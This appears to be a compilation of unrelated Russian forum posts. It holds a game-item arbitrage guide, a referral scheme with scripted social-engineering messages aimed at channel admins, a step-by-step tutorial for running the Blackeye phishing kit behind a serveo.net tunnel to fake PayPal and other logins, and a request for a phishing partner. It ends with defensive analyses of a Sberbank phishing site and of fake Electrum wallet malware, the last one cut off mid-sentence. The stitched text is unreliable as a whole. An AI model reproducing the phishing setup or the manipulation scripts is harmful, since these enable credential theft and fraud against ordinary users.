Вот немного статистики за день:
Вывод с сайта занимает примерно 1-3 дня, выводить будем на вебмани, потому что оттуда проще всего оплачивать товары на Российской бирже. В этой схеме главное вовремя отслеживать изменения в цене, чтобы не вышло так, что у вас купили товар или услугу, а цена на фанпэе изменилась или продавец вышел из онлайна.
Практическая информация по сайту
После прохождения регистрации аккаунта продавца на g2g, нажимаем на кнопку
которая показана на скрине:
General Info - здесь указываем информацию о продукте, какая игра.
Выбираем, что именно продаём из этой игры:
Game details - тут выбираем сервер, на котором будет происходить продажа, я сам не задрот? поэтому старался выбирать игры? где не более 3 серверов, потому что ну его на][уй разбираться в этих мелочах.
ITEM TYPE - тип предмета, эту инфу нужно будет узнавать на российской бирже, что именно за предмет вы продаёте, как правило, продавцы фанпэя пишут об этом сразу в своём предложении, например: продам plex, на g2g выбираем plex.
Product Details - тут нужно описать предмет, я просто копировал инфу оффера с отечественной биржи, переводил через транслейтор и вставлял в соответствующие графы на g2g.
Upload Listing Image - фото предмета или услуги.
Price Setting
Duration - сколько дней действует ваше предложение, после истечения указанного срока оффер уходит в архив, но его можно будет активировать.
Delivery Guidelines - тут нужно указать, каким способом нужно будет доставить валюту или предмет, я не парился и выставлял все подряд, при общении с покупателем я уже договаривался, потому что в разных играх по разному этот процесс выглядит.
ONLINE HR(S) указывать (2) если вы в онлайне, то должны доставить предметы за
2 часа.
OFFLINE HR(S) указывать(24) если вы не в сети, то должны доставить предмет в
течении 24 часов.
Далее жмём галочку и кнопку "SUBMIT". Ждём, когда ваше объявление активируется.
Доброго времени суток, всем читающим! Данный способ позволит Вам зарабатывать
в десятки или даже в сотни раз больше на проектах с реферальной системой. Суть
схемы состоит в том, что Вы даете администраторам пабликов и каналов
возможность заработать и по совместительству зарабатываете сами. У них есть
подписчики, а у вас есть информация, проекты для заработка. Метод работает для
любых проектов с 2-х уровневой или более реферальной системой. Перейдем к
сути, что нужно делать.
ШАГ 1
Нам необходимо зарегистрироваться на проектах, которые соответсвуют нашим
требованиям. На данный момент я использую два проекта в сфере криптовалюты,
для большего профита регистрируемся сразу в двух.
Проект №1
onfocoin.com
Проект №2
![telete.in](/proxy.php?image=https%3A%2F%2Fcdn4.telesco.pe%2Ffile%2FgcWKFc5JtDP0gXPc1eqZxW3LlTj168zdqVCcRjMnXXVkNlqfMnWppYLG4ouDNjv61a3spK5jBZhGkbWWUyh5nMFlq1y5yZfy4uBsZbSXbuGR8gtqhAKiFQnIGluwrQa- cWLadVJ7KwZSbcj5mtWPKQs58iiq_kn2OSWSn9RCkkCRs4mFdw6ojL- uFS0AV3FNAxguRLtScAVqELBAAtiKlhrsdXmGWkAz3yC7CqPIcOSQhfjsI1NTt- IIPhFOjMh0S8_t6aq5j5uP_8d4-ZctC4ULUgyT0KialT-kJ6f5YQCS_U- C-U2xQz2KFabsm5G3jURnRFuTNVPRlyB8ytZQ_w.jpg&hash=8b0f84fa99d1eafb65b005219525d124&return_error=1)
№1 Crypto Social Exchange Platform Effective promotion? Quick cryptocurrency earnings? Support: @BitSocialSupportBot?
telete.in
Процесс регистрации думаю понятен, если будут трудности в шаге №4 подробно
описано, как зарегистрироваться на этих проектах.
ШАГ 2
Теперь необходимо найти админов, которые будут заинтересованы в заработке и
собрать их контакты. Ищем посещаемые группы или каналы по заработку в
сети/крипте/airdrop/схемы заработка и т.д. Вариантов очень много. Для
телеграм-каналов можно использовать этот сервис:
](https://tgstat.ru/)
Крупнейший каталог Telegram-каналов и чатов TGStat — Россия. Более 1 862 967 каналов и чатов, классифицированных по странам, языкам и тематикам
tgstat.ru
Важно помнить, что заинтересованы должны быть не только админы, но и
аудитория. Выбирайте категории, которые я привел в пример и другие подходящие
и приступайте к сбору контактов админов. Еще один важный момент: необходимо
выбирать живые каналы, смотрим посещаемость и охват канала по просмотрам.
Нажимаем на понравившийся канал, там будет информация о публикациях, а также
очень часто в шапке канала контакты для связи с админом.
ШАГ 3
Третий шаг – этап общения, этап социальной инженерии. Не нужно с первых смс
предлагать заработать, в большинстве случаев Вы сразу отправитесь в бан.
Напишите, к примеру, что вы его подписчик и поблагодарите за инфы на канале,
спамеров никто не любит, поэтому начинаем издалека. Будет хорошо если у вас
завяжется какое-то общение, тогда на подсознательном уровне «жертве» будет
сложнее отказаться от нашего предложения. Ниже пример первого смс,
придумывайте сами как завязать разговор, это лишь пример.
Привет!
Я твой подписчик, классный у тебя канал, благодарю за интересные посты.
Можно задать тебе вопрос?
После этого действуете по ситуации, можете немного пообщаться, а можете сразу
предложить заработок. Вот небольшой пример:
Сейчас многие админы зарабатывают хорошие деньги на (название проекта), я не
увидел у тебя на канале информации про проект. Вот скрин заработанного на нем.
А ты с твоим количеством подписчиков сможешь в разы больше заработать. Если
интересно могу скинуть инфу по проекту.
-Ниже прикрепляем скрины заработка.
Скриншоты выплат:
Проект N1
Проект N2
Шаг 4
Если админ заинтересовался, то отправляем ему следующее сообщение:
Для первого проекта:
Новый крипто кошелек - обменник раздает свои монеты
Ссылка https://my.onfocoin.com/ (тут ставим свою реферальную ссылку)
(сайт может подвисать до 5 минут - много людей регистрируются, все хотят
получить халяву) регистрируемся с помощью фейсбук или линкедин, вписываем
пароль, выбираем язык, далее вносим свой номер телефона, вставляем код, что
придет по смс, после этого вписываем свой логин, в аккаунте жмем Validate
account now и там нужно сохранить 12 слов ваших от кошелька и потом
подтвердить, что вы сохранили свои ключи (вставить недостающие слова), готово,
позже монеты можно будет вывести.
Если набрать 3000 монет, то можно продать их за 60$, для этого пишем на почту
exchange@onfocoin.com, свой логин, количество
монет и BTC кошелек, они вам напишут куда отправить токены, отправляем и уже
спустя несколько часов, получаем биток.
Для второго проекта:
---------------
Ссылка https://telete.in/BitSocialRobot?start=ваша рефка
Жмем Start, выбираем русский язык, далее идем в Настройки - Социальные сети,
привязываем свои соц. сети - инстаграм, ютуб, фб, твиттер (тут очень много
заданий и соц. сетей), после того как привязали соц. сети, идем в раздел
задания и начинаем выполнять, заданий там их очень много и очень много новых
приходит, платят в токенах EDC, они уже есть на бирже. Также в Настройках на
всякий случай заполняем свои Личные данные - email, пол и тд.
Кошелек для выплат регистрируем тут
https://wallet.blockchain.mn/registration (обновляйте несколько раз, если
выдает ошибку), регистрация простая, логин должен состоять из латинских букв,
тире и цифр, типа mark-123). После заходим в аккаунт и еще раз вносим свой
пароль и сохраняем свою фразу, для восстановления кошелька.
Вот и всё, монеты, заработанные с этих двух проектов легко можно вывести и
перевести в любую валюту. Лично я пользуюсь кошельком blockchain.com (они
кстати тоже свою крипту раздают, можно получить 25$ за подтверждение
личности). Для второго проекта нужен кошелек, который указан в его описании.
На этом схема закончена, удачных заработков!
Праздники скучно, трепался с одним мембером, он просил дать совет как сделать по быстрому фиш для палки. Богомол подходит но много танцев с бубном а так чтобы за секунды решил по ресерчить и нашел замечательный тул Blackeye!
И так начнём!
Берём самый дешёвый vps с линукс. Качаем софтину:
git clone https://github.com/thelinuxchoice/blackeye
Потом запускаем её:
./blackeye
У софта есть уже вшитые темплайты/файки для
PayPal,eBay,CryptoCurrency,Verizon,Drop Box,Adobe
ID,Shopify,Messenger,TwitchMyspace,Badoo,VK,Yandex,devianART но если надо СВОЙ
ФЕЙК делается прогой SocialFish. Скачать можно тут:
https://github.com/UndeadSec/SocialFish
Как именно он делается и добовляется в Blackeye описывать не буду, думаю
разобраться будет не сложно.
И так фейки готовы теперь надо домена и серт. (для спама не пойдёт!) Делаем
тунель на serveo вот так:
ssh -R my_palka:80:localhost:8080 serveo.net
"my_palka" это суб домен который будет у нас
Всё Готово!
Теперь мы идёт в браусер и задаём:
https://www.my_palka.serveo.net
И о чудо у нас теперь есть фей под палку за 2 минуты дел.
Спасибо за внимание!
ПС: Для спама тема тоже пойдёт но надо будет делать домену, blacktds и letscrypt серт самому!
Поделюсь темой и прибыль 50/50 , нужен человек который сможет создать фишинг сайт и настроить систему.писать в лс
Фишинговый сайт должен выглядеть достаточно правдоподобно и соответствовать какой-либо легенде злоумышленников. Нередко в качестве легенды выбирают что- нибудь связанное с безопасностью, такие ресурсы вызывают больше доверия у потенциальных жертв. И вот вам свежий пример такого подхода: sbersecure.ru.
События вокруг сайта развивались стремительно. Доменное имя было зарегистрировано вечером 16 апреля, а на следующий день на нем уже красовался фишинговый сайт. Изначально в качестве DNS были указаны сервера российского хостера Hostlife, однако, спустя всего 9 часов в NS-записях появились адреса CloudFlare, компании, не нуждающейся в представлении. 17 апреля в 15 часов по московскому времени ресурс обзавелся сертификатом шифрования, выданным все той же CloudFlare.
Познакомимся с фишинговым сайтом поближе.
Для создания ресурса использован достаточно популярный способ частичного
копирования оригинального сайта. В данном случае злоумышленники взяли за
основу страницу «Службы Омбудсмена» банка, поменяв слова «Служба Омбудсмена»
на «Службу Безопасности Клиента».
Вот оригинальная страница Службы Омбудсмена.
А вот фишинговый сайт.
При этом изменения коснулись лишь центральной части сайта, шапка, контекстные меню и футер полностью повторяют оригинальный дизайн. Все ссылки, включая ссылку на страницу авторизации в сервисе «Сбербанк.Онлайн» ведут на настоящий сайт «Сбербанка».
Общий вид фишингового сайта.
Ключевым элементом фишингового ресурса является кнопка с надписью «Срочно получить помощь». Нажатие на нее переадресовывает нас на страницу sbersecure.ru/help.html. Параллельно запускается целый букет java-скриптов, большая часть из которых не работает. Что любопытно, один из скриптов обращается к ресурсу ibbe.group- ib.ru. По-видимому, это скрипт сервиса Secure Bank от компании Group-IB, доставшийся фишинговому ресурсу в наследство от настоящего сайта банка.
Вторая страница ресурса носит название «Сегрегация денежных средств». 18 апреля, когда этот сайт попал в поле зрения, она выглядела вот так.
Попытки ввести произвольный табельный номер сотрудника ни к чему не приводили, вторая же часть – «Сброс логина и пароля Сбербанк онлайн» была неактивна.
На выходных страница претерпела изменения. Форма ввода табельного номера пропала, зато стала доступна форма, предназначенная для изменения логина и пароля от личного кабинета онлайн-банка. Это проясняет возможные варианты использования фишингового ресурса.
Было бы глупо не посмотреть, что происходит с отправленными данными, поэтому заполняем форму произвольными словами и нажимаем на кнопку «Подтвердить».
Нажатие на кнопку в открытом виде передает скрипту sbersecure.ru/php/add_login_bank.php следующие данные: логин и пароль от сервиса «Сбербанк.Онлайн», сведения о регионе проживания и IP-адрес. Информация из полей для ввода нового логина и нового пароля по понятным причинам игнорируется. После этого происходит переадресация на страницу sbersecure.ru/get_info.html, на которой нам предлагают ввести имя, фамилию, телефон, а также данные карты, включая номер, CVV и срок ее действия.
Неплохо, не правда ли? Но мы ведь как бы находимся на странице службы безопасности банка… Вводим фиктивные данные (сайт не проверяет номера карт на валидность) и реально существующий номер телефона. Введенные данные улетают на sbersecure.ru/php/input_user_data.php, а мы оказываемся на следующей странице.
Не совсем понятна логика, возможно, раз уж речь идет о сегрегации денежных средств, здесь жертве было бы необходимо ввести данные своей второй банковской карты. Снова заполняем поля правдоподобным мусором, указывая при этом существующий номер телефона. Введенные данные передаются на sbersecure.ru/php/input_frand.php. Честно говоря, не знаю, что может означать frand, но подозреваю, что это – искаженное friend.
Вуаля!
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fkq%2Fen%2Fj-%2Fkqenj- ej1xoefcvaq-vwso4lceo.png&hash=531e5b8fe0d85bea36918434cf9bba94)
Довольно предсказуемо мы оказываемся на странице ввода кода из СМС-сообщения. Одновременно на телефон прилетает смска из Яндекса. Похоже, что кто-то пытается совершить перевод с использованием сервиса «Яндекс.Деньги». Вводим код, данные о номере телефона и введенных символах уходят на sbersecure.ru/php/input_sms_2.php, а нас возвращает на предыдущую страницу.
Вслед за этим на указанный номер приходит еще одна смска. Продолжать этот цикл можно практически бесконечно.
Конечно, если говорить о деталях схемы перевода денег, то это в значительной степени предположение. Для чистоты эксперимента следовало бы ввести данные валидной, пусть и виртуальной банковской карты, попробовать отследить перемещения финансов и так далее, но даже сейчас понятно, что при помощи этого сайта злоумышленники получают как минимум:
Имея в своем распоряжении такую информацию, можно без особого труда похищать деньги с банковских счетов самыми разными способами.
Естественно, мы с коллегами не могли спокойно пройти мимо такого ресурса, поэтому еще вечером 18 апреля отправили информацию о нем в «Сбербанк», воспользовавшись формой обратной связи на официальном сайте. Спустя 2 дня, 20 апреля, мы получили письмо о том, что наше обращение зарегистрировано.
(с) Виталий Андреев Vit1218
С конца декабря 2018 года многие пользователи популярного кошелька Electrum Bitcoin стали жертвами серии фишинговых атак, которые, по нашим оценкам, достигли более чем на 771 биткойн, что составляет приблизительно 4 миллиона долларов США.
Мошенники заставляли пользователей загрузить вредоносную версию кошелька, используя уязвимость в программном обеспечении Electrum.
В феврале, разработчики Electrum исправили недостаток в своем программном обеспечении, и перенаправляли пользователей на последнюю исправленную версию.
Вскоре после этого, ботнет начал распределенные атаки типа «отказ в обслуживании» (DDoS) на серверы Electrum за то, что, разработчики попытались исправить ошибку. Злоумышленники изменили сценарий так, что защищенные порты были настолько перегружены, что старым клиентам приходилось подключаться к вредоносным.
В этой статье мы расскажем о фишинг-схеме, используемой для распространения вредоносного обновления Electrum, обсудим, куда ушли украденные средства, и, наконец, рассмотрим заражение вредоносным ПО, непосредственно связанное с ботнетом и DDoS.
Кошелек Electrum 101
Чтобы лучше понять, как эти атаки стали настолько успешными, полезно иметь
общее представление о том, как функционирует кошелек Electrum.
Известный как «легкий» биткойн-кошелек, Electrum реализует разновидность методики, описанной в официальном документе под названием «Упрощенная проверка платежей» (SPV). SPV позволяет пользователю отправлять и получать транзакции, не загружая полную копию цепочки биткойнов (размер которой составляет сотни гигабайт).
Вместо этого Electrum работает в конфигурации клиент / сервер. Кошелек (клиент) по умолчанию запрограммирован для подключения к сети одноранговых узлов (сервера), чтобы убедиться, что транзакции действительны.
Хотя исторически это был довольно безопасный метод ведения транзакций, злоумышленники воспользовались тем, что кому-либо разрешено работать в качестве публичного партнера Electrum. Как показано ниже, произошло значительное увеличение числа пиров, активных в сети Electrum:
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/active_peers.png](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2F4Rf1_-mE69gc8A259gfa61IhEkBqP_X3DmJZyru_eGC3huvLNCKBNwhMXsWW- qrWK3aa9Eai33l_SAMpgFaGeVyU0Nh4EVtcikxlFsjI3wNErm-J2ProRlFP3gvnvFR1VAFE7x87VKLnraleKw&hash=bba446e56b0aa72c9e5b2254b69561ef)
Уведомление об обновлении поддельного кошелька Electrum
26 декабря 2018 года разработчик Electrum опубликовал публичное предупреждение
на официальной странице GitHub, предоставив некоторую информацию о атаке:
Для пользователей: когда вы проводите транзакцию, серверы могут сообщать вам
об ошибках транзакции. В версиях Electrum до 3.3.3 эта ошибка - произвольный
текст, и, что еще хуже, это HTML / расширенный текст (это значение по
умолчанию в Qt). Таким образом, сервер, к которому вы подключены, может
попытаться обмануть вас, предложив вам установить вредоносное ПО
(замаскированное под обновление). Вам следует обновить Electrum с официального
сайта, чтобы серверы больше не могли делать это с вами. Если вы видите эти
сообщения / всплывающие окна, просто убедитесь, что вы не следуете им и не
устанавливаете то, что вам говорят. Сообщения - это просто сообщения, они не
могут причинить вам вред.
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/maliciousnodes-600x582.png](/proxy.php?image=https%3A%2F%2Flh4.googleusercontent.com%2FnsZakGWSDtkyagO956SS50Q2cO0rsQprALCZ3oJdFmcoCr4vehDNjqNbxiJxEmmnIkqkH_8YCsh0dEQTyxIWs3lSbnx1HoRdvMvzw2O_EBsnvgA- CTVCeWF3R_RbncPEhdAjJNZyzDOzyMw-Fw&hash=e4ed86bd6dded223dd8a8551e46c8f38)
Если пользователь подключается к вредоносному узлу (с высокой вероятностью) и пытается отправить транзакцию через него, он будет заблокирован из-за уязвимости в Electrum, позволяющей принимать и отображать произвольный HTML / форматированный текст, такой как фальшивое обновление. Сообщение видно ниже:
На втором этапе атаки пользователь вводит вредоносную версию кошелька
Electrum.
Два различных мошеннических проекта были активны на Github примерно с 21 по 27
декабря.
Code:Copy to clipboard
hxxps://github.com/electrum-project/electrum/releases/tag/3.4.1
hxxps://github.com/electrum-wallet/electrum/releases
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/github.png](/proxy.php?image=https%3A%2F%2Flh3.googleusercontent.com%2F1yk9At7RSo5GEZxVjGjiUYQ58H_5QxaSqjTUEfENCZVFRA- FIbgyS2y7nUU0hSCdt0z554aOpP- wjrDPxaZuwdey2NQPfuG76Eq5cEKaHX4wPKYtROBPT6EcD331mP-a1PhrEq7aT7xX0SxdjQ&hash=e2a897d7e7c3873171f246050fc7ae95)
Вредоносные кошельки Electrum
В практических целях мы будем называть следующие вредоносные программы
Вариант 1 и Вариант 2 , однако дальнейшие исследования показали, что
мошенники используют эту уязвимость достаточно давно. Таким образом, вероятно
, что до 21 декабря 2018 года существовали другие разновидности этой
вредоносной программы. Варианты 1 и 2, по-видимому, эксплуатировались
различными мошенниками.
Вариант 1
Вариант 1 уникален тем, что авторы вредоносных программ реализовали функцию
загрузки украденных ключей кошелька и начальных данных на удаленный сервер.
Были предприняты дополнительные усилия для обеспечения того, чтобы эта функция
оставалась скрытой, запутывая код эксфильтрации данных внутри файла, который
обычно не находится в Electrum и называется initmodules.py.
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/malware1.png](/proxy.php?image=https%3A%2F%2Flh5.googleusercontent.com%2FJZTgc5kxK5WZsmuWteBImc3ZV6xwFMhfqbCpzBBxRENQg3nS0J0io8fQ_oAGyfM7s0qfF53_UwoOVv3BtDkl0ZcnuNc9DcaWR9JOY1_KSLYf7IITpvjMxtKGBConf7_cdx9wH- FHaSilBlh_Vw&hash=612edbca88dac992c19008e98bb71551)
Как уже упоминалось, домены эксфильтрации не видны в приведенном выше коде и вместо этого создаются во время выполнения вредоносных программ. Скорее всего, это метод, используемый авторами вредоносных программ для того, чтобы код, содержащийся в файле initmodules.py, был легитимным.
В дополнение к краже данных кошелька, любой баланс, присутствующий в кошельке, отправляется на один из нескольких кошельков злоумышленников. Адрес отправки зависит от формата адреса, используемого кошельком Electrum зараженных пользователей.
Адреса Pay-to-PubkeyHash (P2PKH) используются по умолчанию во время установки и, вероятно, являются наиболее распространенным типом адресов, используемым обычным пользователем биткойнов. Этот факт очевиден при поиске активности каждого адреса.
Code:Copy to clipboard
14MVEf1X4Qmrpxx6oASqzYzJQZUwwG7Fb5 (P2PKH address type)
Total Received: 202.91141530 BTC ~ 776,243.23 USD
bc1q9h36cyfnqcxjeuw629kwmnp5a7k5pky8l2kzww
Total Received: 0.01927492 BTC ~ 73.75 USD
1rTt8GePHv8LceXnujWqerUd81U29m857
Total Received: 0 BTC
3CrC4UitJqNqdkXY5XbJfCaGnbxHkKNqzL
Total Received: 15.22210788 BTC ~ 58,239.77 USD
1FmxAHft8trWjhRNvDsbjD8JNoSzDX8pfD
Total Received: 0 BTC
Вариант 1 Всего биткойнов: 218.1527981 BTC
Вариант 1 USD всего: ~ 1 101 034,00 $
![https://blog.malwarebytes.com/wp-
content/uploads/2019/04/keyprivate.png](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2FJ4G5yjZfV9Jp8F-qe5qh3hGClbItNGRHg4cnKbYRqTE43elFmLrX7RRTPdVxboMFlhxCJ4-UvpwyY0RA6bQr30axrj08ey_OQkZSE6ksIxVnrQyh_B-
_G_s_aoLRcluameCXZb4ns4rzY-7bIw&hash=614114d360d3ae7f7d52441a6be62fea)
Все домены для распространения вредоносных данных, обнаруженные во время нашего анализа Варианта 1, были созданы одновременно, и все они были обнаружены на IP-адресе 31.31.196.86. Этот адрес принадлежит Reg.ru, хостинговой компании, базирующейся в Москве, Россия.
Двоичные файлы варианта 1 также уникальны для более поздних вариантов, поскольку установщики Windows имеют цифровую подпись.
![https://blog.malwarebytes.com/wp-
content/uploads/2019/04/cert.png](/proxy.php?image=https%3A%2F%2Flh3.googleusercontent.com%2F9399FvB1b2NCdlHIkiKfWEQNk3Vr0HLJQIDuJcwvAiAKREqNsTz3y5JKUe4IRd4_4zADOMS5sLgCdrd7izxmUQe8YiyeBWGGI-h7YcLBf3tyhicR34ZQe-
kWJkHxmrZHSJ7h2EmB_5KMy9uNnw&hash=e6cbeb05ef36e0388af34dfc1f9fadc5)
Интересно, что цифровой сертификат, используемый для подписи одного из
вредоносных файлов Windows Electrum (EIZ Ltd), недавно использовался для
подписания несвязанного вредоносного ПО.
Вариант 2
Вариант 1 был очень успешным в краже Биткойнов, но нельзя было исключить, что
мошенники будут искать другие способы кражи. Конечно же, появился второй
вариант кражи кошельков Electrum. Этот вариант атаковал довольно агрессивно,
приводя к краже большего количества биткойнов, чем вариант 1.
Вместо перенаправления жертв на вредоносный сайт Github, вариант 2 размещает вредоносные файлы в домене с аналогичным написанием, что и на официальном сайте загрузки Electrum. Содержимое сайтов по сути является зеркальным отображением.
Хакеры, хорошо понимали Electrum и его код. Например, они отключили автоматическое обновление, удалили приглашения, такие как «Да, я уверен», и даже убрали возможность выполнять транзакции с заменой платы (RBF).
Replace-by-Fee - это функция, которая была добавлена в кодовую базу биткойнов позже в процессе разработки, которая позволила бы пользователям создавать транзакцию двойного расходования. В этом случае, если вы знали об этой функции (и, вероятно, мало кто знает), вы можете отменить перевод украденных средств, удвоив затраты на ввод, используя более высокую плату.
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/rbfremoved2.png](/proxy.php?image=https%3A%2F%2Flh3.googleusercontent.com%2FAa8zQkYTiROHCPBqywPqyQwg427OABuq- kOfY_t-22tPRGFB80PeYwHgWnOhm91gSwRBnXEftx96EppiH9dQS9mkqQYRxku_lvGYapRMULyU88ii6cPKxUZ4YHiprb8_dRPwhUai2A5EgOlPxQ&hash=9bde17aeda453bb2b899271af4343204)
Например, если вы установили вредоносный кошелек и потеряли кучу биткойнов, единственным способом вернуть его была бы попытка транзакции RBF отменить перевод. Но вам нужно действовать быстро, пока перевод не подтвердится. Отключив эту функцию, хакеры сделали все возможное, чтобы это было невозможно.
Ниже приведен модифицированный исходный код Variant 2, файла сценария paytoedit.pyc, перенаправляющего платеж на биткойн-адрес злоумышленника:
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/wallet.png](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2FyRbEGLK1-y7MLI2CM7d6xMzTojVTbv3-q3OGqZ71EUDL- RGh-tMo-uNnnv1S_1778yRZK0Egm09ow3aU65wk4Nood0HifWzksYO4GRtQQqRsGT- IEgraZInYF8GsfrR9gDmD1Kt1gEDT_0xexA&hash=f38bd7c6503514e069d10044410bd25d)
Code:Copy to clipboard
bc1qhsrl6ywvwx44zycz2tylpexza4xvtqkv6d903q
Total received: 187.8298 BTC / 941,436 USD
bc1q92md7868uun8vplp9te0vaecmxyc5rrphdyvxg
Total received: 55.9948 BTC / 201,326 USD
bc1q7hsnpd794pap2hd3htn8hszdfk5hzgsj5md9lz
Total received: 36.7358 BTC / 126,972 USD
bc1ql0p2lrnnxkxnw52phyq8tjr7elsqtnncad6mfv
Total received: 75.2927 BTC / 291,342 USD
bc1qyjkcthq9whn3e8h9dd26gjr9kd8pxmqdgvajwv
Total received: 21.8628 BTC / 84,678 USD
bc1qvr93mxj5ep58wlchdducthe89hcmk3a4uqpw3c
Total received: 27.3636 BTC / 138,733 USD
bc1qcla39fm0q8ka8th8ttpq0yxla30r430m4hgu3x
Total received: 232.6469 BTC / 1,166,068 USD
**Вариант 2 Всего биткойнов: 637,7264 BTC
Вариант 2 USD всего: ~ 2 950 555,00 $
Куда делись все монеты?**
Некоторый простой анализ цепочки блоков по средствам, украденным Вариантом 1,
показывает нам, что злоумышленники разбили BTC на меньшие суммы. В этом случае
48,36 BTC перегруппируется в основном в 3,5 BTC, а затем в 1,9 BTC.
Такая модель, вероятно, свидетельствует о том, что используется метод отмывания денег, известный как «смарфинг». При 1,9 BTC, равном приблизительно 7 000 долларов США, депозиты на эту сумму вряд ли вызовут отчет о валютных операциях (CTR), поскольку эта сумма находится ниже порога в 10 000 долларов США.
Наконец, 11 выводов, показанных выше, объединяются с дополнительными 15 выводами перед отправкой на 329nUnJxz5zgr4vnNPu8JNwpa3qEJfucQX, адрес, который вводится в известный адрес горячего кошелька для обмена криптовалютой Bitfinex.
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/transaction2.png](/proxy.php?image=https%3A%2F%2Flh4.googleusercontent.com%2FP9JYbRgiwBKQtCPNsam_neHbYXzpicpRP7_qvwTXUl_yEDw9rIBNvoEsCdD6G8QXv5VpWTCMlffcV_iq- IAKUFuYyyOZehxoF6jAbYKPL_W8zwz6srwOst3dKx4DCNhuhApUJNsCwrWJFOdo5A&hash=511efef1a600737c41d29fda91e0405c)
![https://blog.malwarebytes.com/wp-content/uploads/2019/04/Screen- Shot-2019-04-15-at-5.31.18-PM.png](/proxy.php?image=https%3A%2F%2Flh3.googleusercontent.com%2FIlx- WbzokHHMsF-TlITdOpahqJdFiiCj9uGQ-5I8-- N8E_EIoJEW8wnxvNt0APcA22O_WTLYxdZDjD9d9enW91tlS1C8wUYT3OLgXwc_xotgupEHnKrmPN0-NBFlAS0GHS3V2MzQWjJ1hsrgOw&hash=b15d195aff193201c71e92484a188dfe)
В воскресенье, 14 апреля, мы заметили, что злоумышленники в Варианте 2 только что обналичили свой новый кошелек на 114.61050153 BTC (более полумиллиона долларов):
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/variant2cash-600x443.jpeg](/proxy.php?image=https%3A%2F%2Flh3.googleusercontent.com%2F4ayUq9dXw1UrtwPHRa040NESGqhlrFK5HOmeEbxC4SxCeMWrKmZHu0BxS5vLXd0dXsVp8xLuE7XPgNDqvMvkY4hb6D51N0_c- xvsOBBacDRjECH2tyIrhvDbSSvEsadiyilDy_V4yqRGwwyGMg&hash=b0ebef30455095b29655e020df4e39e4)
Многие движения украденных средств из Варианта 2, похоже, следуют аналогичной схеме. Давайте посмотрим на недавний вывод 38.38517511 BTC с адреса злоумышленника «bc1qhsrl6ywvwx44zycz2tylpexza4xvtqkv6d903q». Транзакция всегда делится на 2 выхода:
Принимая во внимание передачу 36.38011271 BTC, к которой мы еще вернемся, давайте сначала проследим за передачей 2.0050624 BTC по адресу «1BCtXcP3gc7FygZMegeKUPsogo68aKRSPA», а затем «1wotccCFTuLQdCv46Bz3zqcosDCDwAWhd». Мы видим транзакцию, содержащую 2 выхода, в которых адрес «3DvWYYkzgHbyBgUTSjtPsLmkzs1R9frSrz» потребляет все средства. Другой вывод с именем «not-address» - это то, что известно как код операции сценария OP_RETURN. Этот код операции обычно используется для записи данных в блокчейн.
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/opcode.png](/proxy.php?image=https%3A%2F%2Flh3.googleusercontent.com%2F_C6x1S4aBq- kVZpRPzOhRIZ7jgfSgls- tkq1Hf_Z8PGhUCVsyKZZZZOhpEhfbPtQBnG4eG28pwxIsU9I5ROaBFuDlWKsI5CANHzabJXFWa8_tf_l0fmpnzf3skvTlCxCojUXC3DyS1utiv- VaA&hash=160d9268545ba8f7c6ce64332055bc4f)
Действительно, транзакция содержит некоторые закодированные данные, которые, скорее всего, хранятся как часть транзакции с несколькими подписями:
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/multisig.png](/proxy.php?image=https%3A%2F%2Flh4.googleusercontent.com%2FAsKRXg29YQ1hBKHGR2nft3I-rY06FzbrpOE9VB5B8mmp1rM8Ifvl8nbVOA4Mv- UZelUa_LGHcdCrUp6iYKCMki9QE7EFR3gIeFePEsjs2wGVg_IN5wj75hsTAeMWRL- Ggf1005LgG6SFTP3JgQ&hash=66fe2dbed2d0451f036d00c506c40e93)
Хотя точное назначение данных, хранящихся с использованием OP_RETURN, неизвестно, это не имеет большого значения, и мы все еще можем следить за поступательным движением средств BTC Варианта 2, чтобы узнать их назначение:
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/destination.png](/proxy.php?image=https%3A%2F%2Flh4.googleusercontent.com%2FARi9uiMoGY7c0Sv8PXQDCBcMayTzxbPWdyAdSbr6YLCJsZp- Gk3gCt3IJR4BkSH0I2SRVbdw0x3M2UHU6DWvJCiTPjgMq0baZC_Crt7VraI2lqgKfNfBgtvAy07_G2tfNHxGwxShXpKwH1XSUQ&hash=1d84be1b56cc8f4fd5805c4f67b1ed35)
Следующий по величине вывод 1.96991794 из предыдущей транзакции потребляется идентификатором транзакции f5abb14ffc1d57494934d10a2114b2e4fc812b7e18f73d0f6202a995d2bea1be, который содержит 445 входов на общую сумму 100.02103004 BTC.
Эти 100 BTC затем перемещаются по адресу 1NDyJtNTjmwk5xPNhjgAMu4HDHigtobu1s, известному адресу горячего кошелька для Binance. Давайте кратко рассмотрим пункт назначения 36.38011271 BTC, который мы отметили ранее. В целях краткости мы следуем аналогичным путям отслеживания средств, поскольку они разделены таким же образом, как и выше:
Как видим, 25,8 BTC отправляются по адресу «3MRqgoPe6vBNVEn9Fo85qK7zvaLb9e9T2x». Многие адреса, связанные с этим кошельком, по-видимому, связаны с тем, что на вид мошеннические сайты предлагают «удвоить биткойн».
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/doubler.png](/proxy.php?image=https%3A%2F%2Flh5.googleusercontent.com%2FBSQTYGlylEWdsq2I9dG- Dt7_BmsJsEP9cou6v3xTt6OWPYxy8YY-qIMW8aMk-_9X8B8bnoLIU-Q- vJQ5l5NGMUOW_dg0sWL08JH- nJUM9O8X0STHrYkNkztW5Y8dGad6g7axWsyY9cxQ4BQJFA&hash=c42327f23dce4d64ac1f54d42179de1b)
Поскольку маловероятно, что вы сможете просто удвоить любое количество отправленных вами биткойнов, вполне вероятно, что эти веб-сайты существуют для того, чтобы предлагать другую функцию, такую как смешивание / отмывание средств для преступников.
Контрмеры и репрессии
Столкнувшись с такими распространенными атаками на свою пользовательскую базу,
